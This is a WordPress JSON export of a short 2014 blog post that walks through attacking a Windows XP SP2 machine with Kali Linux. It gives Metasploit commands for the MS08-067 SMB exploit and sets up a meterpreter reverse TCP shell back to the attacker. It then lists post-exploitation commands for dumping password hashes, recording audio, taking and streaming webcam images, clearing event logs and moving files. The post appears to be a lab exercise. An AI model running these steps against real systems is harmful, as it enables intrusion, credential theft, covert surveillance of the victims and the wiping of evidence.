{"id":54,"date":"2014-12-13T21:45:52","date_gmt":"2014-12-14T03:45:52","guid":{"rendered":"http:\/\/sinjinsmith.net\/?p=54"},"modified":"2016-06-29T13:16:34","modified_gmt":"2016-06-29T18:16:34","slug":"using-kali-linux-to-attack-winxp-sp2","status":"publish","type":"post","link":"https:\/\/sinjinsmith.net\/?p=54","title":{"rendered":"Using Kali Linux to Attack WinXP SP2"},"content":{"rendered":"<p>Windows XP SP 2 Setup:<\/p>\n<p>Make sure Automatic Updates are disabled, the Windows Firewall is off, and the system has been restarted at least once.<\/p>\n<p>Metasploit:<\/p>\n<blockquote><p>use exploit\/windows\/smb\/ms08_067_netapi<\/p>\n<p>set rhost 192.168.1.45<\/p>\n<p>exploit #Do not execute at this point if you want to add the payload below<\/p>\n<p>? or help\u00a0#see the list of available meterpreter commands<\/p>\n<p>set PAYLOAD windows\/meterpreter\/reverse_tcp<\/p>\n<p>set LHOST &lt;attacking_kali_host_ip&gt;<\/p>\n<p>set LPORT &lt;local_port&gt; #default port is 4444<\/p><\/blockquote>\n<p>You can verify the connection from the remote machine with the following command:<\/p>\n<blockquote><p>netstat -a | grep 4444 #4444 assumes default local port<\/p><\/blockquote>\n<p>Some interesting Meterpreter commands are:<\/p>\n<blockquote><p>hashdump #get password hashes to crack, crackstation.net<br \/>\nrecord_mic #record audio<br \/>\nwebcam_list #list available webcams<br \/>\nweb_snap #take a picture with the webcam<br \/>\nweb_stream #stream video from webcam<br \/>\nsysinfo #get remote system information<br \/>\nshutdown #turn off remote computer<br \/>\nreboot #reboot remote computer<br \/>\nps #list processes running on remote computer<br \/>\nkill #end process running on remote computer<br \/>\nexecute \u2013f &lt;file&gt; #start program on remote machine<br \/>\nclearev #clear the event log<br \/>\nupload #send file to remote system<br \/>\ndownload #retrieve file from remote system<\/p><\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>Windows XP SP 2 Setup: Make sure Automatic Updates are disabled, the Windows Firewall is off, and the system has been restarted at least once. Metasploit: use exploit\/windows\/smb\/ms08_067_netapi set rhost 192.168.1.45 exploit #Do not execute at this point if you want to add the payload below ? or help\u00a0#see the list of available meterpreter commands [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,8,9],"tags":[],"class_list":["post-54","post","type-post","status-publish","format-standard","hentry","category-linux","category-metasploit","category-security"],"_links":{"self":[{"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=\/wp\/v2\/posts\/54","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=54"}],"version-history":[{"count":4,"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=\/wp\/v2\/posts\/54\/revisions"}],"predecessor-version":[{"id":110,"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=\/wp\/v2\/posts\/54\/revisions\/110"}],"wp:attachment":[{"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=54"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=54"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sinjinsmith.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=54"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}